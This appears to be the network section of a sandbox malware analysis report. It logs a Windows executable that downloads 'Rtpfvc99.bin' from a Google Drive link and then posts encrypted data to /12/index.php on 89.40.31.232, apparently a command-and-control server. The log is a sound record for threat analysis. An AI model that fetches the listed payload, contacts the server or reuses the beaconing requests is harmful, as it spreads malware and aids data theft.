                                                              Nov 4, 2024 09:28:01.211252928 CET4996480192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:01.215886116 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:01.216022968 CET804996489.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:01.216104031 CET4996480192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:01.216226101 CET4996480192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:01.216286898 CET4996480192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:01.220994949 CET804996489.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:01.221062899 CET4996480192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:01.221313000 CET804996489.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:01.221337080 CET804996489.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:01.221363068 CET4996480192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:01.221385956 CET804996489.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:01.221393108 CET4996480192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:01.221396923 CET804996489.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:01.221429110 CET4996480192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:01.221431017 CET804996489.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:01.221441031 CET804996489.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:01.221442938 CET4996480192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:01.221478939 CET4996480192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:01.221479893 CET804996489.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:01.221520901 CET804996489.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:01.221528053 CET4996480192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:01.221530914 CET804996489.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:01.221573114 CET4996480192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:01.225908995 CET804996489.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:01.225992918 CET4996480192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:01.226151943 CET804996489.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:01.226197004 CET804996489.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:01.226198912 CET4996480192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:01.226206064 CET804996489.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:01.226233006 CET804996489.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:01.226243019 CET804996489.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:01.226248980 CET4996480192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:01.226284027 CET4996480192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:01.226313114 CET4996480192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:01.269366026 CET804996489.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:01.269481897 CET4996480192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:01.317259073 CET804996489.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:01.738337994 CET804996489.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:02.168504953 CET804996489.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:02.168592930 CET4996480192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:05.038798094 CET4996480192.168.2.789.40.31.232

                                                              UDP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Nov 4, 2024 09:27:49.524883032 CET5154653192.168.2.71.1.1.1
                                                              Nov 4, 2024 09:27:49.531809092 CET53515461.1.1.1192.168.2.7
                                                              Nov 4, 2024 09:27:50.869951963 CET6116753192.168.2.71.1.1.1
                                                              Nov 4, 2024 09:27:50.877304077 CET53611671.1.1.1192.168.2.7

                                                              DNS Queries

                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Nov 4, 2024 09:27:49.524883032 CET192.168.2.71.1.1.10xc80cStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                              Nov 4, 2024 09:27:50.869951963 CET192.168.2.71.1.1.10xfea3Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                                                              DNS Answers

                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Nov 4, 2024 09:27:49.531809092 CET1.1.1.1192.168.2.70xc80cNo error (0)drive.google.com142.250.185.238A (IP address)IN (0x0001)false
                                                              Nov 4, 2024 09:27:50.877304077 CET1.1.1.1192.168.2.70xfea3No error (0)drive.usercontent.google.com142.250.185.97A (IP address)IN (0x0001)false

                                                              HTTP Request Dependency Graph

                                                              • drive.google.com
                                                              • drive.usercontent.google.com
                                                              • 89.40.31.232

                                                              HTTP Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.74993289.40.31.232801916C:\Users\user\Desktop\No. 1349240400713.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 4, 2024 09:27:55.018486977 CET269OUTPOST /12/index.php HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                                                              Host: 89.40.31.232
                                                              Content-Length: 107
                                                              Cache-Control: no-cache
                                                              Data Raw: 4a 4c 89 28 39 ff 4c 2f fb 39 2f fb 39 4f ed 3f 4e ed 3e 3c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 ff 28 39 ff 4f 4e 89 28 39 f0 48 2f fa 49 2f fb 3f 2f fb 35 2f fb 3e 4c 8d 28 39 fc 28 39 f9 28 39 fb 28 38 8c 28 39 fb 28 39 f1 4e 2f fb 35 2f fb 3c 2f fb 3b 2f fb 39 4b ed 3e 32
                                                              Data Ascii: JL(9L/9/9O?N><>3>>>;>>>3>:>=?N(9(9ON(9H/I/?/5/>L(9(9(9(8(9(9N/5/</;/9K>2
                                                              Nov 4, 2024 09:27:55.950261116 CET1236INHTTP/1.1 200 OK
                                                              Date: Mon, 04 Nov 2024 08:27:55 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Transfer-Encoding: chunked
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 34 34 34 32 61 64 0d 0a ef bb bf 31 69 f6 41 59 bb 7f 41 b1 7e 78 83 74 79 bc 46 7d f8 46 59 99 66 72 86 77 47 bd 40 60 9d 3d 46 a2 44 3b 85 4e 3e fa 42 5e b8 5b 5f bf 3d 41 f4 22 69 f6 31 64 f6 a4 1f 91 21 af de 10 7c 69 06 17 aa aa 1d 9d 21 a1 c2 53 78 6f 04 5f e4 a9 5e d5 3d ef 9d 13 6f 6c 04 00 84 9f ff f8 0f c2 ad 3d 0f 00 68 3a 36 3a 6f f8 b4 c2 ad 3d 0b 00 68 3a 89 c5 6f f8 0c c2 ad 3d 0b 00 68 3a c9 c5 6f f8 0c c2 ad 3d 0b 00 68 3a c9 c5 6f f8 0c c2 ad 3d 0b 00 68 3a 71 c5 6f f8 02 dd 17 33 0b b4 61 f7 e8 7d 6e b4 c1 e3 f9 55 62 73 48 4a bb aa 08 8a 6d af 8d 5e 6a 6e 06 55 bd e5 0d 9d 2c b0 d8 53 2b 69 06 1a 8d 8a 3c d8 61 ad c9 58 25 0d 65 30 ed c5 6f f8 0c c2 ad 3d d0 6d 63 fb 56 c9 0a 6a 93 ce c8 af 94 0c 0d a8 25 ab 0a 6b 92 ce c8 af e7 6e 09 a9 54 c9 0a 6a e0 ac 37 af 95 0c 0d a8 25 ab 08 6b 92 ce c8 af 59 69 0b 52 56 c9 0a 6a 5c 87 ad 3d 47 01 6a 3a 48 7f 4d 54 0c c2 ad 3d 0b 00 68 3a 29 c5 6d d9 07 c3 a3 37 0b 06 68 3a c9 c1 6f f8 0c c2 ad 3d 0b 00 68 3a c9 d5 6f f8 0c e2 ad 3d 0b 00 [TRUNCATED]
                                                              Data Ascii: 4442ad1iAYA~xtyF}FYfrwG@`=FD;N>B^[_=A"i1d!|i!Sxo_^=ol=h:6:o=h:o=h:o=h:o=h:qo3a}nUbsHJm^jnU,S+i<aX%e0o=mcVj%knTj7%kYiRVj\=Gj:HMT=h:)m7h:o=h:o=h*o=h:o=h:o=Jh:/=h:=h:o= h:o= h:9o=h:o4=h:o=_h:o=h:o=h:o=h:o=h:o=h:o=h:x= h:o=h:o=h:o"Ohh:9o=h:o=h:oL}h:HMT=h:oX=_h:oxh:oh=h:Yo=Jo=h:o=YS,i;b0LPf=jpBe^drcg1EAh=h:oX=%r[oX=h:xGqzXo= h:x= h:o"Oh$Xol=h:oh:o=h:oxh:}o=h:o$=kh:Qo=h:o[=h:o=h:oc=h:o=h:o=h:o=h:,o=>h:o=h: [TRUNCATED]
                                                              Nov 4, 2024 09:27:55.950284004 CET1236INData Raw: c2 a8 3d 0d 00 6f 3a c1 c5 66 f8 06 c2 a6 3d 07 00 65 3a a8 b5 06 d5 61 b1 80 4a 62 6e 45 59 a6 b7 0a d5 6f ad c3 4e 64 6c 0d 17 a5 f4 42 c9 21 f2 83 59 67 6c 68 7b a5 a9 00 9b 4f ad c3 4e 64 6c 0d 3a a2 a0 1d 96 69 ae 9e 0f 25 41 04 56 a6 a6 2c
                                                              Data Ascii: =o:f=e:aJbnEYoNdlB!Yglh{ONdl:i%AV,bQn/_XHPhQ`Ley`mGNcpdd:i%GNcpdd:cRge'OOVnr_]K~dnU xIHPh}!aODf+UiM~t-LO
                                                              Nov 4, 2024 09:27:55.950295925 CET1236INData Raw: c2 e2 3d 45 00 37 3a 80 c5 21 f8 4a c2 e2 3d 0b 00 68 3a 74 c1 80 06 0c c2 ac 3d 0b 00 62 3a c6 c5 c4 c7 0c c2 a7 3d 04 00 c3 05 f6 c5 6f f8 0c c2 ad 3d 0f 00 6c 3a cb c5 6f f8 0c c2 ad 3d 0b 00 68 3a c9 c5 6f f8 ec c0 ad 3d 0a 00 3b 3a bd c5 1d
                                                              Data Ascii: =E7:!J=h:t=b:=o=l:o=h:o=;:e=l.:i=e:o=X:_5=?*:o@=+:|=e:a=h:o=d:x=H:c=j:b=Cx:)e=n,:o=b:c=
                                                              Nov 4, 2024 09:27:55.950320005 CET1236INData Raw: f2 f7 0d 8a b2 59 31 f9 cc 69 fb 59 c6 ab 2e 09 55 3b 0b da f5 7e fe 0f 97 a9 35 18 0a 3f 5b ba ad 06 96 6b b6 c2 53 3a 10 58 34 cf c6 3a fc 0b d1 aa 6f 6e 64 05 55 a7 a1 5e e6 3c de ab 3e 5e 04 62 29 dc 88 06 9b 7e ad de 52 6d 74 48 79 a6 b7 1f
                                                              Data Ascii: Y1iY.U;~5?[kS:X4:ondU^<>^b)~RmtHy~TdnY6iY.A'y_9vTiyXEHU>80^^>(ko|AOds\;anaJzX;ii&Di;o=;i0Gne"AF+y/I#P-
                                                              Nov 4, 2024 09:27:55.950330973 CET1236INData Raw: c6 ab 2e 09 55 3b 0b da f5 7e fe 0f 97 a9 35 18 0a 3f 5b ba ad 06 96 6b b6 c2 53 3a 10 58 34 cf c6 3a fc 0b d1 aa 6f 6e 64 05 55 a7 a1 5e e6 3c de ab 3e 5e 04 62 29 dc 88 06 9b 7e ad de 52 6d 74 48 79 a6 b7 1f 97 7e a3 d9 54 64 6e 59 36 f9 cf 69
                                                              Data Ascii: .U;~5?[kS:X4:ondU^<>^b)~RmtHy~TdnY6iY.A'y_9}wI+CHxS;ii&Di;o=;i0Gn[ XU{wtO7KaJMlH;<~mLA2)6OFllMt0U4f2t
                                                              Nov 4, 2024 09:27:55.950342894 CET1060INData Raw: d3 ab 3e 5e 04 60 29 c3 92 0e 8b 64 ab c3 5a 7f 6f 06 0b d9 f5 61 fe 0f 97 a9 3a 18 07 3a 5f ad a8 00 96 68 f3 b3 0d 17 06 6b 6f cd cf 7c ed 41 ab ce 4f 64 73 07 5c bd e5 2c 97 7e b2 c2 4f 6a 74 01 55 a7 f4 4c c8 2d c4 ae 68 0f 03 7b 20 84 ac 0c
                                                              Data Ascii: >^`)dZoa::_hko|AOds\,~OjtUL-h{ c[ +UOeTegHj_z0BC8;_zh3< `H\`d#oM1t ~=sINK[$ !9GOrK)0HIy1=fU1"U
                                                              Nov 4, 2024 09:27:55.950418949 CET1236INData Raw: f3 04 f0 08 29 1f 5b 5b 50 fa 40 9f 8d c8 21 81 c6 35 0f c3 61 ca 37 7f a5 5e d7 e4 ea 78 30 ea b0 9a 2f ff 6f d9 06 ae 47 96 aa be 4f 9e 2b 6e 1e 66 b0 14 d5 b1 9c f8 ad 63 7b df d3 7f d3 b0 01 6b 4c df 39 81 e2 14 8a f6 96 c3 3e 7c df 4c 6f 49
                                                              Data Ascii: )[[P@!5a7^x0/oGO+nfc{kL9>|LoI|risBt$v4f'a'Gx]!\HQ"kb2h6g~A?JbWGYS1CiGAUeY;xg.X*?a~R
                                                              Nov 4, 2024 09:27:55.950431108 CET1236INData Raw: 05 6f 39 c1 f5 62 fe 05 e8 2b 75 8d f7 65 3b c8 c0 6a f8 0f 40 af 3c 0b 10 ff b0 0a 99 6c bc 3a 1f 44 89 a6 77 b3 f4 b0 94 22 f9 bd ec d9 4c 50 6d 64 29 62 0b d1 83 83 7a 83 e9 19 a2 e4 57 ab 7d 38 fa c7 8c 8d 2e 5b 99 b5 40 89 27 38 43 a3 9a 37
                                                              Data Ascii: o9b+ue;j@<l:Dw"LPmd)bzW}8.[@'8C7!ie~AFj0OXubWxS)p5!a"Z:p"X89]>'h>;aAvYd0{v*NED}Fv*Agse4aew)T
                                                              Nov 4, 2024 09:27:55.950448036 CET1236INData Raw: 82 6a 1e cf cc 45 7e 44 44 5a 30 0a 09 6e 0b 4b c7 7a c8 8e c0 bc 3f 0a 01 58 bb 47 f5 18 c9 07 f2 a4 3b 08 55 6c 3c da c7 3a ab 3d d1 9d 2c 0d 03 3d 3e c1 d6 65 af 6d b1 c5 54 65 67 1c 55 a7 f4 7f c8 02 c4 ae 68 0f 07 7b 3d 9b a0 0b 95 63 ac c9
                                                              Data Ascii: jE~DDZ0nKz?XG;Ul<:=,=>emTegUh{=c0t<kThrIOMdrN-;Ul9"oNdf!\fpHjm?=8~"R=j'gi&Di3d+ue;_C7j<0QZ=g;#n3
                                                              Nov 4, 2024 09:27:55.950473070 CET1236INData Raw: f0 1e 98 14 56 87 60 e8 a0 fc 60 df cd 95 1d 15 b2 ad 6a bf c6 51 07 2b de a9 8e d7 89 86 30 2b 30 33 10 c4 69 67 99 0c 7a cc 5a b9 5b 54 a3 89 9e fa e0 80 b1 af 7c 7e a2 93 8d a3 05 b5 d9 4c 06 7f b6 b7 cd 1b 41 bf 62 b5 d9 c5 99 db 91 cf e3 b7
                                                              Data Ascii: V``jQ+0+03igzZ[T|~LAbX|pi0Bi:fv/<}0w<r+C<nz;<C<j ='y#NK!8;aM>,JXrm_=7=>lC;2n9j'36]>&eZ
                                                              Nov 4, 2024 09:27:55.955601931 CET1236INData Raw: 88 be 51 de 51 55 6b c2 e4 92 d1 ed fe 5c a2 9e 10 72 a5 45 34 1f 17 25 d5 ed 81 90 fa 97 68 b8 e9 2e 49 c1 2b db 01 8f 26 9f be 45 03 ba 5b 5f c9 74 87 d4 01 3a 9a 5b b0 55 5a b2 25 48 0e 17 98 c9 5d 99 9c 06 15 8b cd bd 88 57 20 6c 4d 6f 11 1f
                                                              Data Ascii: QQUk\rE4%h.I+&E[_t:[UZ%H]W lMo)6.R3zF^X1}KBBPk![*R<qI^sPp<iGn'<4 i>GX?X':9e~MT&sIN;+n;1hi


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.74996489.40.31.232801916C:\Users\user\Desktop\No. 1349240400713.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 4, 2024 09:28:01.216226101 CET164OUTPOST /12/index.php HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                                                              Host: 89.40.31.232
                                                              Content-Length: 58476
                                                              Cache-Control: no-cache
                                                              Nov 4, 2024 09:28:01.216286898 CET11124OUTData Raw: 31 63 a6 6b 65 8c 5b 32 8b 4b 3b f8 3c 27 f8 38 39 89 20 3e fc 34 32 e5 34 32 9e 4c 27 8d 4c 48 fb 3a 3b f1 4c 3a f0 35 5d e5 5b 4c f1 4c 32 8a 3a 4b 8c 20 3a 8e 4c 3a e5 39 32 f1 34 27 8a 39 58 8c 20 4e f0 3d 3a fe 3a 39 f0 49 5b 8b 49 34 8e 4c
                                                              Data Ascii: 1cke[2K;<'89 >4242L'LH:;L:5][LL2:K :L:924'9X N=::9I[I4L/:K>>>>(8(9(9(9(9(9(9(9(9(8L/:/:HL/5O?N>8>2>9H/9/</>/I/>/4I>2>;><>>(9q/</=/H/=vddb}(8(9(9(8Hdhxchv(9(9q/5/
                                                              Nov 4, 2024 09:28:01.221062899 CET1236OUTData Raw: 07 22 6a 8c 83 42 24 63 e0 0d ae 6d 39 7c 68 09 a9 dc 5f da f9 25 a8 42 0d 22 6a 87 0a 82 24 63 f3 dd 0b 8d 13 de 98 0b f7 dc 5c 58 b1 2c 4f dc 5d 0b 8d 27 a3 be 07 a9 ec 91 0a e3 4f e9 81 75 26 0c b6 bd 80 34 7f d5 0d a6 e2 ef 23 1a 99 69 ff 6b
                                                              Data Ascii: "jB$cm9|h_%B"j$c\X,O]'Ou&4#ikC[.0B%kZHSxHLK$16?W4g 3hhnb>~z, /O]lBsd1H?,$]\]7>rRd
                                                              Nov 4, 2024 09:28:01.221363068 CET2472OUTData Raw: 0c ba d6 8b 9a 69 19 be ac f7 da cb 25 a3 ff 6a a2 05 2b df f6 d9 52 bf 14 4f f0 ac e7 05 39 88 f2 87 49 70 99 5b 8d 0e 00 82 57 22 c9 25 af 6a 8c 83 8d 20 2f c8 19 5b 8d 0d 2f dc b9 9e c8 5f 58 19 41 68 99 48 1e c8 5f 58 19 4d ce 6a 9b 98 48 07
                                                              Data Ascii: i%j+RO9Ip[W"%j /[/_XAhH_XMjH@%(|\_B%$\@d#$#%l6[O(\O!HG"jd"l:jPG@$\\O/w"%lB%AN"l=B%H'XM|a3})<:QF)$mj>TWmSKD
                                                              Nov 4, 2024 09:28:01.221393108 CET2472OUTData Raw: a0 3b 99 0f 24 2e fe bc ca 7d 30 c8 7e 84 4f 11 db ec df 67 5a 54 34 03 2d 61 eb 2f 3e e1 b9 6d 05 58 ee a5 11 f8 8e 48 38 e3 44 a8 a0 94 6d 09 88 40 e8 cd cc 1a 44 2a 44 7f 03 ef 8e 90 b0 87 ef ae fe 4e 79 02 d7 31 56 36 4c d4 bd f3 bc bd d3 77
                                                              Data Ascii: ;$.}0~OgZT4-a/>mXH8Dm@D*DNy1V6Lwb"s?zW;J+',miCx-X^Hz86-'s{xTu`\-.!q[hFIu#Q"@A;Z*;e}%e$E}3+n
                                                              Nov 4, 2024 09:28:01.221429110 CET2472OUTData Raw: 47 99 af ac c7 fc a4 17 8d 0e b2 12 24 62 6e 3c b7 20 aa 68 5a 8c 83 8e 24 71 99 87 0a a6 25 cf f3 19 92 68 6e 7b 81 87 7c e0 c8 1c d0 c1 58 9b fc 80 84 5f ba 0e f9 a9 dc aa a7 ce 8d 11 8d 20 1e c4 41 5b 42 57 22 c9 24 3b 83 48 3a db 19 9e 2b 44
                                                              Data Ascii: G$bn< hZ$q%hn{|X_ A[BW"$;H:+DJZjX#d"_X]:llB%0ZfAH.sod(gLpfk$W13MnT{oX@y8hc0o<0O<87"
                                                              Nov 4, 2024 09:28:01.221442938 CET2472OUTData Raw: cd e1 13 b0 1d 67 70 24 fc bd dc 1e c8 9e 74 ba 94 d1 28 8b ad 42 20 99 16 a6 44 16 2a 2f 09 1a cf aa 46 9c f8 95 2d 0c bb aa b8 9b a9 fe 8e 7a a1 98 26 64 3b 19 7a 0a f8 34 37 73 f0 20 9c 97 56 c8 60 56 d5 a9 64 3b 02 57 11 0a fa d4 6e fb 65 a4
                                                              Data Ascii: gp$t(B D*/F-z&d;z47s V`Vd;WneDj[;(U$@<O^5X=O>[B; Vo]WGELhszA4g3F%KPiDB+r1>;0?>`U2zSA$)EPyKsnTDTr
                                                              Nov 4, 2024 09:28:01.221478939 CET4944OUTData Raw: 0c 22 6a 87 0a e0 af 80 c8 47 23 a1 25 12 99 48 1e c8 5c 4f dc 0d 5b 8d 19 0a 99 48 1e c8 5c 4f dc 0d 5b 8d 19 06 82 25 a8 48 07 22 6a 8d 00 e0 af 8a da 87 22 68 0f 80 e0 ad 6b 8d 19 9e c8 b9 58 9a dd 0b 8d 19 9e 08 25 a8 42 0d 23 e1 65 aa aa 5c
                                                              Data Ascii: "jG#%H\O[H\O[%H"j"hkX%B#e\O[H\O[\O"j [H\O[< /\]DO['YynI#;fb0.KlBW"%jZHPW$bh^J2NF"D=
                                                              Nov 4, 2024 09:28:01.221528053 CET2472OUTData Raw: e0 c1 77 d2 23 b7 87 35 52 36 d0 0f fc 4f 02 4a ac 35 91 9f c7 7d cb 8e e3 c9 f1 2b bf e6 09 ac 16 4c 64 88 96 63 10 56 ac b3 5b 54 51 a9 36 9f 80 71 b0 7a 46 8e 1d 1c 15 ba d6 57 52 ef 96 11 e4 35 d8 de 32 91 35 ec 12 be 5b d6 ad be 3e 44 1e 6d
                                                              Data Ascii: w#5R6OJ5}+LdcV[TQ6qzFWR525[>Dm&sA<Eo:&hM+K-OwBq{l\t[H$ec7y${9G"50EwuvX|[H%H"j%H"jP"j$bhoXDJ
                                                              Nov 4, 2024 09:28:01.221573114 CET4944OUTData Raw: 7b 52 82 de 8f e0 3a 19 75 7f 7a 0c 70 11 21 51 9f 62 c7 04 00 e9 c9 18 88 42 15 fa 27 cf 0b 03 ee 0d 92 2b 0d b3 3c c4 ca 6c 97 db 92 59 38 68 01 43 cb 23 b2 cc 01 9a 86 73 58 f5 03 20 4f 92 66 52 51 c3 c4 fa 2b 1a 2d 5f ac 88 75 b1 2a 92 6f 34
                                                              Data Ascii: {R:uzp!QbB'+<lY8hC#sX OfRQ+-_u*o4M0?`.:t-QoGpZ}}~#PAbi!3Q4LDzNgm{T6,fc>A|K*V\+Pec^(}#05LCB5q6rPX
                                                              Nov 4, 2024 09:28:01.225992918 CET2472OUTData Raw: c6 0c e8 9d 72 d4 8e 43 dd 9e 51 6b 21 44 6c 34 d6 23 27 26 42 56 dd c4 05 c5 77 57 b3 8d 22 69 87 bd f4 7d 5a f3 42 92 6e 5f fa ee 86 d6 a4 b0 95 f5 c8 71 6d fc 15 24 8c 6f 2e 55 5b 3b d1 81 24 19 fa 43 14 4a ed 9e e5 a9 10 ce ba 76 be 5d 70 c9
                                                              Data Ascii: rCQk!Dl4#'&BVwW"i}ZBn_qm$o.U[;$CJv]p^jiAe}\OH\O[H\O[<\J[M [H O]FO(M\J"h_ZHE_[YLm,+D1^cCU|'g=e4|kB"j
                                                              Nov 4, 2024 09:28:02.168504953 CET203INHTTP/1.1 200 OK
                                                              Date: Mon, 04 Nov 2024 08:28:01 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Content-Length: 5
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: ef bb bf 4f 4b
                                                              Data Ascii: OK


                                                              HTTPS Proxied Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.749905142.250.185.2384431916C:\Users\user\Desktop\No. 1349240400713.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-11-04 08:27:50 UTC216OUTGET /uc?export=download&id=1MH4PBcg5lUR7-iNRXL3tEF69vWwWBAnh HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              2024-11-04 08:27:50 UTC1610INHTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Mon, 04 Nov 2024 08:27:50 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1MH4PBcg5lUR7-iNRXL3tEF69vWwWBAnh&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Content-Security-Policy: script-src 'nonce-tbuULe2rFrYnm8rGJHljWg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.749911142.250.185.974431916C:\Users\user\Desktop\No. 1349240400713.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-11-04 08:27:51 UTC258OUTGET /download?id=1MH4PBcg5lUR7-iNRXL3tEF69vWwWBAnh&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              2024-11-04 08:27:54 UTC4914INHTTP/1.1 200 OK
                                                              Content-Type: application/octet-stream
                                                              Content-Security-Policy: sandbox
                                                              Content-Security-Policy: default-src 'none'
                                                              Content-Security-Policy: frame-ancestors 'none'
                                                              X-Content-Security-Policy: sandbox
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Cross-Origin-Embedder-Policy: require-corp
                                                              Cross-Origin-Resource-Policy: same-site
                                                              X-Content-Type-Options: nosniff
                                                              Content-Disposition: attachment; filename="Rtpfvc99.bin"
                                                              Access-Control-Allow-Origin: *
                                                              Access-Control-Allow-Credentials: false
                                                              Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                              Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                              Accept-Ranges: bytes
                                                              Content-Length: 115264
                                                              Last-Modified: Sun, 03 Nov 2024 21:08:02 GMT
                                                              X-GUploader-UploadID: AHmUCY2fhpbBwhlKOk-lcRFHwOkQwd9QNj7TuU3csd6NkRUGHeDYKoSNhQJ4fn-vdz3G2dmw0lYtBxOP5Q
                                                              Date: Mon, 04 Nov 2024 08:27:53 GMT
                                                              Expires: Mon, 04 Nov 2024 08:27:53 GMT
                                                              Cache-Control: private, max-age=0
                                                              X-Goog-Hash: crc32c=7Z7QrA==
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close
